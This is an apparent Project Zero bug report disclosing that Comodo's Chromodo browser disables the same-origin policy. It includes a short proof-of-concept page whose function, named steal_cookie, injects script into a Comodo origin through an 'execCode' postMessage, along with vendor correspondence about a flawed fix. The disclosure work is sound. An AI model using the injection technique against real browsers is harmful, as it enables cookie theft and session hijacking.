New issue
Advanced search Search tips
Issue 704
Starred by 23 users
Status: Fixed
Owner:
taviso@google.com
Closed: Feb 2016
Cc:
project-...@google.com

Blocking:
issue 713

Restricted
  • Only users with Commit permission may comment.



Sign in to add a comment
 Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security.
Project Member Reported by taviso@google.com, Jan 22 2016 Back to list 
When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.

https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they  ***disable the same origin policy***.... ?!?..

To reproduce, do something like this:


<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Windows 7 x86-2016-01-21-16-48-44.png
258 KB View Download
Project Member Comment 1 by taviso@google.com, Jan 25 2016 
I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply:

FYI, I still haven't got a response. The same origin policy is basically disabled for all of your customers, which means there is no security on the web....this is about as bad as it gets. If the impact isn't clear to you, please let me know.

This vulnerability is bad enough to start paging people.
exploit.html
1.3 KB View Download
Project Member Comment 2 by taviso@google.com, Jan 29 2016 
Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix.

I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week.
Comment 3 Deleted
Comment 4 Deleted
Project Member Comment 5 by taviso@google.com, Feb 2 2016
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit. 

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.

The deleted comments above contained discussion about the bypass, I'll move them into a new issue.
Project Member Comment 6 by taviso@google.com, Feb 2 2016 
Discussion about the incorrect fix is in  issue 713 .
Project Member Comment 7 by taviso@google.com, Feb 2 2016
Blocking: google-security-research:713
Comment 8 by kobrasre...@gmail.com, Feb 2 2016 
"After "discussion" with Comodo (I can't really get any response from them, but I'm trying)"

Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money.
Comment 9 by l33t...@gmail.com, Feb 2 2016 
toppest of keks, my friend.

There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin.
Project Member Comment 10 by taviso@google.com, Feb 2 2016
Labels: Restrict-AddIssueComment-Commit
Sign in to add a comment